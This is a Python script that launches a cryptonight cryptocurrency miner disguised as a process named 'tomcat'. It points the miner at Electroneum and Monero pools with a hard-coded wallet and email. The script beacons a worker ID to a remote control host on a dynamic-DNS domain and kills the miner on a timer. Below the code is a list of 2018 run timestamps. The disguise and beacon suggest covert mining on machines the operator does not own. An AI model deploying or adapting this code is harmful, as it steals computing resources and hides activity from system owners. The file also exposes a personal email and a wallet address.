import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:39:01.600674
#2018-02-17 17:27:01.456635
#2018-02-17 19:16:03.591006
#2018-02-17 21:06:05.174348
#2018-02-17 22:50:05.654680
#2018-02-18 00:35:07.308249
#2018-02-18 02:25:01.710152
#2018-02-18 04:11:07.078334
#2018-02-18 06:02:05.860443
#2018-02-18 07:53:04.859035
#2018-02-18 09:40:06.373902
#2018-02-18 11:25:08.486249
#2018-02-18 13:11:05.659356
#2018-02-18 15:01:04.297552
#2018-02-18 16:49:04.159507
#2018-02-18 18:37:07.067311
#2018-02-18 20:25:05.656611
#2018-02-18 22:11:01.527846
#2018-02-18 23:58:01.748001
#2018-02-19 01:44:01.844464
#2018-02-19 03:33:06.981611
#2018-02-19 05:18:06.551689
#2018-02-19 07:06:07.261858
#2018-02-19 08:55:03.895044
#2018-02-19 10:43:06.521024
#2018-02-19 12:31:07.754103
#2018-02-19 14:18:12.115289
#2018-02-19 16:08:01.318270
#2018-02-19 17:55:01.369836
#2018-02-19 19:43:01.340967
#2018-02-19 21:32:05.214663
#2018-02-19 23:19:05.895520
#2018-02-20 01:05:08.877639
#2018-02-20 02:53:07.062941
#2018-02-20 04:42:08.178483
#2018-02-20 06:26:07.806928
#2018-02-20 08:11:08.208809
#2018-02-20 09:57:02.182495
#2018-02-20 11:40:09.361700
#2018-02-20 13:27:06.477023
#2018-02-20 15:13:05.666639
#2018-02-20 16:57:05.772143
#2018-02-20 18:45:11.631564
#2018-02-20 20:36:08.393875
#2018-02-20 22:22:07.590824
#2018-02-21 00:03:07.605460
#2018-02-21 01:50:09.043031
#2018-02-21 03:38:04.458092
#2018-02-21 05:26:06.165648
#2018-02-21 07:14:06.382158
#2018-02-21 09:00:01.822134
#2018-02-21 10:48:06.299553
#2018-02-21 12:34:10.265798
#2018-02-21 14:22:01.947836
#2018-02-21 16:09:05.809744
#2018-02-21 18:00:16.194896
#2018-02-21 19:47:09.920119
#2018-02-21 21:35:01.960017
#2018-02-21 23:22:07.817647
#2018-02-22 01:12:05.754868
#2018-02-22 02:59:06.117088
#2018-02-22 04:45:10.725516
#2018-02-22 06:31:07.851816
#2018-02-22 08:18:07.599561
#2018-02-22 10:07:08.133268
#2018-02-22 11:52:09.178549
#2018-02-22 13:36:08.751398
#2018-02-22 15:25:04.113976
#2018-02-22 17:12:04.883707
#2018-02-22 18:59:02.139337
#2018-02-22 20:50:10.294193
#2018-02-22 22:35:09.868763
#2018-02-23 00:23:06.051406
#2018-02-23 02:10:10.734082
#2018-02-23 04:01:07.536975
#2018-02-23 05:49:04.726148
#2018-02-23 07:29:07.467869
#2018-02-23 09:34:01.866632
#2018-02-23 11:39:01.459226
#2018-02-23 13:28:06.220226
#2018-02-23 15:14:01.359266
#2018-02-23 17:03:01.747338
#2018-02-23 18:52:06.150160
#2018-02-23 20:38:06.848220
#2018-02-23 22:26:05.374619
#2018-02-24 00:13:04.705930
#2018-02-24 02:05:08.105367
#2018-02-24 03:42:05.695742
#2018-02-24 05:10:09.237212
#2018-02-24 06:47:07.804750
#2018-02-24 08:20:01.473774
#2018-02-24 09:48:07.393938
#2018-02-24 11:32:06.311262
#2018-02-24 12:59:06.008472
#2018-02-24 14:33:06.498548
#2018-02-24 16:02:07.685930
#2018-02-24 17:44:06.609657
#2018-02-24 19:16:04.819146
#2018-02-24 20:49:05.478437
#2018-02-24 22:37:06.882859
#2018-02-25 02:52:03.457411
#2018-02-25 06:28:01.997464